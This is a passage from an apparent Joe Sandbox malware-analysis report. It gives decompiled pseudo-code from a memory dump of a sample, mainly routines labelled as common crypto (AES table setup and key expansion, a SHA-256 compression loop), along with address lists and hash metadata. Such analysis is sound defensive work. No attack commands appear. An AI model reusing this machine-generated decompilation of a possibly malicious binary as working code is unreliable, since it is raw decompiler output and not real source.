						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E0008500B(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x0008473f
0x00084742
0x00084746
0x00084749
0x0008474d
0x00084750
0x000847be
0x000847c1
0x00084810
0x00084810
0x00084813
0x00084780
0x00084782
0x00084787
0x00084789
0x0008482e
0x00084832
0x0008483b
0x00084840
0x00084841
0x00084845
0x00084847
0x0008484c
0x0008484f
0x00084851
0x0008487a
0x0008487a
0x0008487d
0x00084880
0x00084887
0x00084889
0x0008488c
0x0008488e
0x00084892
0x00084892
0x00084895
0x000848a0
0x000848a0
0x000848a2
0x000848a2
0x000848a4
0x000848aa
0x000848aa
0x000848af
0x000848b2
0x000848bd
0x000848bd
0x000848bf
0x000848bf
0x000848ca
0x000848ce
0x000848ce
0x000848d1
0x000848d7
0x000848d9
0x000848dc
0x000848ec
0x000848f1
0x000848f1
0x00084906
0x0008490b
0x0008490e
0x00084913
0x00084916
0x00084918
0x0008491a
0x0008491d
0x00084920
0x0008492d
0x00084932
0x00084932
0x00084920
0x00084939
0x0008493e
0x00084941
0x00084946
0x00084949
0x0008494b
0x00084958
0x0008495d
0x0008494b
0x00084960
0x00084963
0x00084968
0x00084968
0x000848b4
0x000848b7
0x00000000
0x00000000
0x000848b9
0x00000000
0x000848b9
0x000848a6
0x000848a8
0x00000000
0x00000000
0x00000000
0x000848a8
0x00084897
0x0008489a
0x00000000
0x00000000
0x0008489c
0x00000000
0x0008489c
0x00084890
0x00084890
0x00084890
0x00000000
0x00084890
0x00084882
0x00084885
0x00000000
0x00000000
0x00000000
0x00084885
0x00084855
0x00084858
0x0008485a
0x00084862
0x00084864
0x0008486e
0x00084870
0x00084872
0x00000000
0x00000000
0x00084874
0x00084878
0x00084878
0x00000000
0x00084878
0x00084866
0x00000000
0x00084866
0x0008485c
0x00000000
0x0008485c
0x00084834
0x00000000
0x00084834
0x0008478f
0x0008478f
0x00000000
0x0008478f
0x0008481a
0x0008481a
0x0008481d
0x000847ef
0x000847ef
0x000847f0
0x000847f2
0x000847f4
0x00000000
0x000847f4
0x0008481f
0x00084822
0x00000000
0x00000000
0x00084828
0x00084797
0x00084797
0x00000000
0x00084797
0x000847c3
0x00084806
0x00000000
0x00084806
0x000847c5
0x000847c8
0x000847fb
0x000847fd
0x00000000
0x000847fd
0x000847ca
0x000847cd
0x000847eb
0x000847eb
0x000847eb
0x000847eb
0x00000000
0x000847eb
0x000847cf
0x000847d2
0x000847e4
0x00000000
0x000847e4
0x000847d4
0x000847d7
0x00000000
0x00000000
0x000847db
0x00000000
0x000847db
0x00084752
0x00000000
0x00000000
0x00084758
0x0008475b
0x0008479b
0x0008479b
0x0008479e
0x000847b7
0x00000000
0x000847b7
0x000847a0
0x000847a0
0x000847a3
0x00000000
0x00000000
0x000847a6
0x000847a9
0x00000000
0x00000000
0x000847ab
0x000847ae
0x00000000
0x000847ae
0x0008475d
0x00084796
0x00000000
0x00084796
0x00084762
0x00000000
0x00000000
0x0008476b
0x00000000
0x00000000
0x00084770
0x00000000
0x00000000
0x00084775
0x00000000
0x00000000
0x0008477e
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction ID: ec991c7fddbbe948cdd0bf01e560e749933dde87fbb7f737e2216455325c2bb9
Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction Fuzzy Hash: 3151AC70608B8797DBB8B9288859BFF67C9BB63700F18051AE9C2D7283DB05DE458356

Uniqueness

Uniqueness Score: -1.00%

Function 0006DE6C Relevance: .2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0006DE6C() {
				intOrPtr _v8;
				char _v521;
				char _t140;
				signed int _t154;
				signed int _t155;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t179;
				signed int _t181;
				signed char _t192;
				signed int _t199;
				signed int _t207;
				void* _t208;
				signed int _t209;
				signed char _t211;
				signed int _t219;
				void* _t220;

				_t140 = 0;
				_t179 = 1;
				_t207 = 1;
				do {
					 *(_t220 + _t140 - 0x304) = _t207;
					 *(_t220 + _t140 - 0x205) = _t207;
					 *((char*)(_t220 + _t207 - 0x104)) = _t140;
					_v8 = _t140 + 1;
					asm("sbb ecx, ecx");
					_t140 = _v8;
					_t207 = _t207 ^  ~(_t207 & 0x80) & 0x0000011b ^ _t207 + _t207;
				} while (_t207 != 1);
				_t208 = 0;
				do {
					 *(_t208 + 0xa51a0) = _t179;
					asm("sbb ecx, ecx");
					_t179 = _t179 + _t179 ^  ~(_t179 & 0x80) & 0x0000011b;
					_t208 = _t208 + 1;
				} while (_t208 < 0x1e);
				_t181 = 0;
				do {
					if(_t181 == 0) {
						_t209 = 0;
					} else {
						_t209 =  *( &_v521 - ( *(_t220 + (_t181 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
					}
					_t192 = (_t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) ^ 0x00006300) >> 0x00000008 ^ _t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209);
					 *(_t181 + 0xa4fa0) = _t192;
					 *(0xa5dc1 + _t181 * 4) = _t192;
					 *(0xa5dc0 + _t181 * 4) = _t192;
					 *(0xa59c3 + _t181 * 4) = _t192;
					 *(0xa59c0 + _t181 * 4) = _t192;
					 *(0xa55c3 + _t181 * 4) = _t192;
					 *(0xa55c2 + _t181 * 4) = _t192;
					 *(0xa51c2 + _t181 * 4) = _t192;
					 *(0xa51c1 + _t181 * 4) = _t192;
					if(_t192 == 0) {
						_t154 = 0;
					} else {
						_t154 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
					}
					 *(0xa5dc3 + _t181 * 4) = _t154;
					 *(0xa59c2 + _t181 * 4) = _t154;
					 *(0xa55c1 + _t181 * 4) = _t154;
					 *(0xa51c0 + _t181 * 4) = _t154;
					if(_t192 == 0) {
						_t155 = 0;
					} else {
						_t155 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
					}
					_t219 = _t181 & 0x000000ff;
					 *(0xa5dc2 + _t181 * 4) = _t155;
					 *(0xa59c1 + _t181 * 4) = _t155;
					 *(0xa55c0 + _t181 * 4) = _t155;
					 *(0xa51c3 + _t181 * 4) = _t155;
					if((((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219)) == 5) {
						_t211 = 0;
					} else {
						_t211 =  *((intOrPtr*)( &_v521 - ( *(_t220 + (((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 & 0x000000ff ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
					}
					 *(_t181 + 0xa50a0) = _t211;
					if(_t211 == 0) {
						_t159 = 0;
					} else {
						_t159 =  *(_t220 + ( *(_t220 + (_t211 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
					}
					_t199 = _t211 & 0x000000ff;
					 *(0xa6dc2 + _t181 * 4) = _t159;
					 *(0xa69c1 + _t181 * 4) = _t159;
					 *(0xa65c0 + _t181 * 4) = _t159;
					 *(0xa61c3 + _t181 * 4) = _t159;
					 *(0xa7dc2 + _t199 * 4) = _t159;
					 *(0xa79c1 + _t199 * 4) = _t159;
					 *(0xa75c0 + _t199 * 4) = _t159;
					 *(0xa71c3 + _t199 * 4) = _t159;
					if(_t211 == 0) {
						_t160 = 0;
					} else {
						_t160 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
					}
					 *(0xa6dc0 + _t181 * 4) = _t160;
					 *(0xa69c3 + _t181 * 4) = _t160;
					 *(0xa65c2 + _t181 * 4) = _t160;
					 *(0xa61c1 + _t181 * 4) = _t160;
					 *(0xa7dc0 + _t199 * 4) = _t160;
					 *(0xa79c3 + _t199 * 4) = _t160;
					 *(0xa75c2 + _t199 * 4) = _t160;
					 *(0xa71c1 + _t199 * 4) = _t160;
					if(_t211 == 0) {
						_t161 = 0;
					} else {
						_t161 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
					}
					 *(0xa6dc1 + _t181 * 4) = _t161;
					 *(0xa69c0 + _t181 * 4) = _t161;
					 *(0xa65c3 + _t181 * 4) = _t161;
					 *(0xa61c2 + _t181 * 4) = _t161;
					 *(0xa7dc1 + _t199 * 4) = _t161;
					 *(0xa79c0 + _t199 * 4) = _t161;
					 *(0xa75c3 + _t199 * 4) = _t161;
					 *(0xa71c2 + _t199 * 4) = _t161;
					if(_t211 == 0) {
						_t162 = 0;
					} else {
						_t162 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
					}
					 *(0xa6dc3 + _t181 * 4) = _t162;
					 *(0xa69c2 + _t181 * 4) = _t162;
					 *(0xa65c1 + _t181 * 4) = _t162;
					 *(0xa61c0 + _t181 * 4) = _t162;
					_t181 = _t181 + 1;
					 *(0xa7dc3 + _t199 * 4) = _t162;
					 *(0xa79c2 + _t199 * 4) = _t162;
					 *(0xa75c1 + _t199 * 4) = _t162;
					 *(0xa71c0 + _t199 * 4) = _t162;
				} while (_t181 < 0x100);
				return _t162;
			}

0x0006de75
0x0006de7a
0x0006de7c
0x0006de83
0x0006de83
0x0006de8a
0x0006de91
0x0006de99
0x0006dea8
0x0006deae
0x0006deb1
0x0006deb3
0x0006deb7
0x0006deb9
0x0006debb
0x0006dec8
0x0006dece
0x0006ded0
0x0006ded1
0x0006ded6
0x0006ded8
0x0006deda
0x0006def4
0x0006dedc
0x0006deef
0x0006deef
0x0006df12
0x0006df14
0x0006df1a
0x0006df21
0x0006df28
0x0006df2f
0x0006df36
0x0006df3d
0x0006df44
0x0006df4b
0x0006df54
0x0006df6b
0x0006df56
0x0006df61
0x0006df61
0x0006df6d
0x0006df74
0x0006df7b
0x0006df82
0x0006df8b
0x0006dfa2
0x0006df8d
0x0006df98
0x0006df98
0x0006dfa4
0x0006dfa9
0x0006dfb5
0x0006dfc1
0x0006dfca
0x0006dfda
0x0006e00e
0x0006dfdc
0x0006e00a
0x0006e00a
0x0006e010
0x0006e018
0x0006e02f
0x0006e01a
0x0006e025
0x0006e025
0x0006e031
0x0006e034
0x0006e03b
0x0006e042
0x0006e049
0x0006e050
0x0006e057
0x0006e05e
0x0006e065
0x0006e06e
0x0006e082
0x0006e070
0x0006e078
0x0006e078
0x0006e084
0x0006e08b
0x0006e092
0x0006e099
0x0006e0a0
0x0006e0a7
0x0006e0ae
0x0006e0b5
0x0006e0be
0x0006e0d2
0x0006e0c0
0x0006e0c8
0x0006e0c8
0x0006e0d4
0x0006e0db
0x0006e0e2
0x0006e0e9
0x0006e0f0
0x0006e0f7
0x0006e0fe
0x0006e105
0x0006e10e
0x0006e122
0x0006e110
0x0006e118
0x0006e118
0x0006e124
0x0006e12b
0x0006e132
0x0006e139
0x0006e140
0x0006e141
0x0006e148
0x0006e14f
0x0006e156
0x0006e15d
0x0006e16e

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef5d5f8e67524fb7e9767e0fc34bea02047b40906c7310579f3821f28708d66b
Instruction ID: 6c5accceb5124b288496881f3e563f72a3ed695f42622c866c5e51efec38f20c
Opcode Fuzzy Hash: ef5d5f8e67524fb7e9767e0fc34bea02047b40906c7310579f3821f28708d66b
Instruction Fuzzy Hash: E5817E8161DAD49DE7564F7D3CA42FA3EE25733341F1D40BAC4CA86263C17B4A98D721

Uniqueness

Uniqueness Score: -1.00%

Function 0006E8A0 Relevance: .2, Instructions: 154
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0006E8A0(signed char __ecx, char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int _v36;
				signed char _v40;
				signed char _t96;
				signed int _t117;
				signed int* _t121;
				signed int* _t122;
				void* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				char* _t132;
				void* _t133;
				signed int _t135;
				signed char _t137;
				signed char* _t139;
				signed char* _t141;
				void* _t161;
				void* _t164;

				_t137 = __ecx;
				_t135 = _a4 - 6;
				_v40 = __ecx;
				_v36 = _t135;
				_t96 = E0007F4B0( &_v32, _a4, 0x20);
				_t141 =  &(( &_v40)[0xc]);
				_t117 = 0;
				_t133 = 0;
				_t126 = 0;
				if(_t135 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t127 = 0xa51a0;
						do {
							_v32 = _v32 ^  *((_t141[0x15 + _t135 * 4] & 0x000000ff) + 0xa4fa0);
							_v31 = _v31 ^  *((_t141[0x16 + _t135 * 4] & 0x000000ff) + 0xa4fa0);
							_v30 = _v30 ^  *((_t141[0x17 + _t135 * 4] & 0x000000ff) + 0xa4fa0);
							_v29 = _v29 ^  *((_t141[0x14 + _t135 * 4] & 0x000000ff) + 0xa4fa0);
							_t96 =  *_t127;
							_v32 = _v32 ^ _t96;
							_v36 = _t127 + 1;
							if(_t135 == 8) {
								_t121 =  &_v28;
								_v40 = 3;
								do {
									_t129 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t129 = _t129 - 1;
									} while (_t129 != 0);
									_t58 =  &_v40;
									 *_t58 = _v40 - 1;
								} while ( *_t58 != 0);
								_t122 =  &_v12;
								_v40 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0xa4fa0);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0xa4fa0);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0xa4fa0);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0xa4fa0);
								do {
									_t130 = 4;
									do {
										_t96 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t96;
										_t122 =  &(_t122[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t79 =  &_v40;
									 *_t79 = _v40 - 1;
								} while ( *_t79 != 0);
							} else {
								if(_t135 > 1) {
									_t132 =  &_v28;
									_v40 = _t135 - 1;
									do {
										_t124 = 0;
										do {
											_t96 =  *((intOrPtr*)(_t132 + _t124 - 4));
											 *(_t132 + _t124) =  *(_t132 + _t124) ^ _t96;
											_t124 = _t124 + 1;
										} while (_t124 < 4);
										_t132 = _t132 + 4;
										_t53 =  &_v40;
										 *_t53 = _v40 - 1;
									} while ( *_t53 != 0);
								}
							}
							_t131 = 0;
							if(_t135 <= 0) {
								L37:
								_t164 = _t117 - _a4;
							} else {
								while(_t117 <= _a4) {
									if(_t131 >= _t135) {
										L33:
										_t161 = _t133 - 4;
									} else {
										_t96 =  &(( &_v32)[_t131]);
										_v40 = _t96;
										while(_t133 < 4) {
											 *((intOrPtr*)(_t137 + 0x18 + (_t133 + _t117 * 4) * 4)) =  *_t96;
											_t131 = _t131 + 1;
											_t96 = _v40 + 4;
											_t133 = _t133 + 1;
											_v40 = _t96;
											if(_t131 < _t135) {
												continue;
											} else {
												goto L33;
											}
											goto L34;
										}
									}
									L34:
									if(_t161 == 0) {
										_t117 = _t117 + 1;
										_t133 = 0;
									}
									if(_t131 < _t135) {
										continue;
									} else {
										goto L37;
									}
									goto L38;
								}
							}
							L38:
							_t127 = _v36;
						} while (_t164 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t126 < _t135) {
							_t139 =  &(( &_v32)[_t126]);
							while(_t133 < 4) {
								_t125 = _t133 + _t117 * 4;
								_t96 =  *_t139;
								_t126 = _t126 + 1;
								_t139 =  &_a4;
								_t133 = _t133 + 1;
								 *(_v40 + 0x18 + _t125 * 4) = _t96;
								_t135 = _v36;
								if(_t126 < _t135) {
									continue;
								}
								break;
							}
							_t137 = _v40;
						}
						if(_t133 == 4) {
							_t117 = _t117 + 1;
							_t133 = 0;
						}
						if(_t126 < _t135) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t96;
			}

0x0006e8a6
0x0006e8b6
0x0006e8b9
0x0006e8be
0x0006e8c2
0x0006e8c7
0x0006e8ca
0x0006e8cc
0x0006e8ce
0x0006e8d2
0x0006e919
0x0006e91c
0x0006e922
0x0006e927
0x0006e936
0x0006e945
0x0006e954
0x0006e963
0x0006e967
0x0006e969
0x0006e96e
0x0006e975
0x0006e9a6
0x0006e9aa
0x0006e9b2
0x0006e9b4
0x0006e9b5
0x0006e9b8
0x0006e9ba
0x0006e9bb
0x0006e9bb
0x0006e9c0
0x0006e9c0
0x0006e9c0
0x0006e9cc
0x0006e9d0
0x0006e9de
0x0006e9ed
0x0006e9fc
0x0006ea0b
0x0006ea0f
0x0006ea11
0x0006ea12
0x0006ea12
0x0006ea15
0x0006ea17
0x0006ea18
0x0006ea18
0x0006ea1d
0x0006ea1d
0x0006ea1d
0x0006e977
0x0006e97a
0x0006e983
0x0006e987
0x0006e98b
0x0006e98b
0x0006e98d
0x0006e98d
0x0006e991
0x0006e994
0x0006e995
0x0006e99a
0x0006e99d
0x0006e99d
0x0006e99d
0x0006e9a4
0x0006e97a
0x0006ea24
0x0006ea28
0x0006ea69
0x0006ea69
0x00000000
0x0006ea2a
0x0006ea31
0x0006ea5d
0x0006ea5d
0x0006ea33
0x0006ea37
0x0006ea3a
0x0006ea3e
0x0006ea48
0x0006ea4c
0x0006ea51
0x0006ea54
0x0006ea55
0x0006ea5b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0006ea5b
0x0006ea3e
0x0006ea60
0x0006ea60
0x0006ea62
0x0006ea63
0x0006ea63
0x0006ea67
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0006ea67
0x0006ea2a
0x0006ea6c
0x0006ea6c
0x0006ea6c
0x0006e927
0x00000000
0x0006e8d4
0x0006e8df
0x0006e8e5
0x0006e8e9
0x0006e8f2
0x0006e8f5
0x0006e8f8
0x0006e8f9
0x0006e8fc
0x0006e8fd
0x0006e901
0x0006e907
0x00000000
0x00000000
0x00000000
0x0006e907
0x0006e909
0x0006e909
0x0006e910
0x0006e912
0x0006e913
0x0006e913
0x0006e917
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0006e917
0x0006e8d4
0x0006ea7d
0x0006ea7d

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66120706e53ecfe5305ff6c408df6931cab64676feaeba98d708c53786d77c8b
Instruction ID: b3dff748295182e0fff11394db1de7298d089f92b8c2966c104c2eb8f3c31e48
Opcode Fuzzy Hash: 66120706e53ecfe5305ff6c408df6931cab64676feaeba98d708c53786d77c8b
Instruction Fuzzy Hash: 75519F395083D54EC712CF24D1844AEBFE2BFDA314F5949AEE4D54B213D220A649CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 0006F968 Relevance: .1, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E0006F968() {
				signed int _t85;
				signed int* _t86;
				unsigned int* _t87;
				void* _t88;
				unsigned int _t90;
				unsigned int _t113;
				signed int _t115;
				signed int* _t120;
				signed int _t121;
				signed int* _t122;
				signed int _t123;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t140;

				_t120 =  *(_t140 + 0x130);
				_t123 = 0;
				_t86 =  &(_t120[0xa]);
				do {
					 *((intOrPtr*)(_t140 + 0x30 + _t123 * 4)) = E00086064( *_t86);
					_t86 =  &(_t86[1]);
					_t123 = _t123 + 1;
				} while (_t123 < 0x10);
				_t87 = _t140 + 0x68;
				_t137 = 0x30;
				do {
					_t90 =  *(_t87 - 0x34);
					_t113 =  *_t87;
					asm("rol esi, 0xe");
					_t87 =  &(_t87[1]);
					asm("ror eax, 0x7");
					asm("rol eax, 0xd");
					asm("rol ecx, 0xf");
					_t87[1] = (_t90 ^ _t90 ^ _t90 >> 0x00000003) + (_t113 ^ _t113 ^ _t113 >> 0x0000000a) +  *((intOrPtr*)(_t87 - 0x3c)) +  *((intOrPtr*)(_t87 - 0x18));
					_t137 = _t137 - 1;
				} while (_t137 != 0);
				_t88 = 0;
				_t138 = _t120[4];
				_t115 = _t120[5];
				 *(_t140 + 0x10) = _t120[1];
				 *(_t140 + 0x20) = _t120[3];
				 *(_t140 + 0x1c) =  *_t120;
				 *(_t140 + 0x18) = _t120[6];
				_t121 =  *(_t140 + 0x1c);
				 *(_t140 + 0x14) = _t120[2];
				 *(_t140 + 0x24) = _t120[7];
				while(1) {
					 *(_t140 + 0x28) = _t138;
					asm("ror esi, 0xb");
					asm("rol eax, 0x7");
					asm("ror eax, 0x6");
					 *(_t140 + 0x18) = _t115;
					_t33 = _t88 + 0x93a50; // 0x0
					_t135 = (_t138 ^ _t138 ^ _t138) + ( !_t138 &  *(_t140 + 0x18) ^ _t115 & _t138) +  *_t33 +  *((intOrPtr*)(_t140 + _t88 + 0x2c));
					_t88 = _t88 + 4;
					_t136 = _t135 +  *(_t140 + 0x24);
					 *(_t140 + 0x24) =  *(_t140 + 0x18);
					_t138 =  *(_t140 + 0x20) + _t136;
					asm("ror edx, 0xd");
					asm("rol eax, 0xa");
					asm("ror eax, 0x2");
					_t85 =  *(_t140 + 0x10);
					 *(_t140 + 0x10) = _t121;
					 *(_t140 + 0x20) =  *(_t140 + 0x14);
					 *(_t140 + 0x14) = _t85;
					_t121 = (_t121 ^ _t121 ^ _t121) + (( *(_t140 + 0x14) ^  *(_t140 + 0x10)) & _t121 ^  *(_t140 + 0x14) &  *(_t140 + 0x10)) + _t136;
					if(_t88 >= 0x100) {
						break;
					}
					_t115 =  *(_t140 + 0x28);
				}
				 *(_t140 + 0x1c) = _t121;
				_t122 =  *(_t140 + 0x130);
				 *_t122 =  *_t122 +  *(_t140 + 0x1c);
				_t122[1] = _t122[1] +  *(_t140 + 0x10);
				_t122[2] = _t122[2] + _t85;
				_t122[3] = _t122[3] +  *(_t140 + 0x20);
				_t122[5] = _t122[5] +  *(_t140 + 0x28);
				_t122[6] = _t122[6] +  *(_t140 + 0x18);
				_t122[4] = _t122[4] + _t138;
				_t122[7] = _t122[7] +  *(_t140 + 0x24);
				return _t85;
			}

0x0006f972
0x0006f979
0x0006f97b
0x0006f97e
0x0006f985
0x0006f989
0x0006f98c
0x0006f98e
0x0006f995
0x0006f999
0x0006f99a
0x0006f99a
0x0006f99f
0x0006f9a3
0x0006f9a6
0x0006f9a9
0x0006f9b7
0x0006f9ba
0x0006f9cc
0x0006f9cf
0x0006f9cf
0x0006f9d7
0x0006f9db
0x0006f9de
0x0006f9e1
0x0006f9e8
0x0006f9ef
0x0006f9f6
0x0006f9fd
0x0006fa01
0x0006fa05
0x0006fa0f
0x0006fa11
0x0006fa15
0x0006fa1a
0x0006fa29
0x0006fa3e
0x0006fa42
0x0006fa4a
0x0006fa4e
0x0006fa51
0x0006fa55
0x0006fa59
0x0006fa5b
0x0006fa60
0x0006fa67
0x0006fa7e
0x0006fa84
0x0006fa8c
0x0006fa90
0x0006fa94
0x0006fa9d
0x00000000
0x00000000
0x0006fa0b
0x0006fa0b
0x0006faa3
0x0006faa7
0x0006fab2
0x0006fab8
0x0006fabd
0x0006fac4
0x0006facb
0x0006fad2
0x0006fad5
0x0006fadc
0x0006fae9

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8c6f68d539db209c9356dcbee249f475a71ccec6885f2be0343622205cc67c7
Instruction ID: 2685c85665e77930ebc8a3edb06a8781d19be01af519425ac010f0b93ec049b0
Opcode Fuzzy Hash: d8c6f68d539db209c9356dcbee249f475a71ccec6885f2be0343622205cc67c7
Instruction Fuzzy Hash: 5F512871A083028BC748CF19D48059AF7E1FF88354F058A2DE899A7741DB34E959CB96

Uniqueness

Uniqueness Score: -1.00%

Function 000737C1 Relevance: .1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000737C1(unsigned int __ecx) {
				intOrPtr _t39;
				signed int _t47;
				intOrPtr _t48;
				signed int _t55;
				signed int _t61;
				signed int _t66;
				intOrPtr _t78;
				signed int _t82;
				unsigned char _t84;
				signed int* _t86;
				intOrPtr _t87;
				unsigned int _t88;
				unsigned int _t89;
				signed int _t90;
				void* _t91;

				_t88 =  *(_t91 + 0x20);
				_t61 = 0;
				_t86 =  *(_t91 + 0x28);
				_t89 = __ecx;
				 *(_t91 + 0x18) = __ecx;
				_t86[3] = 0;
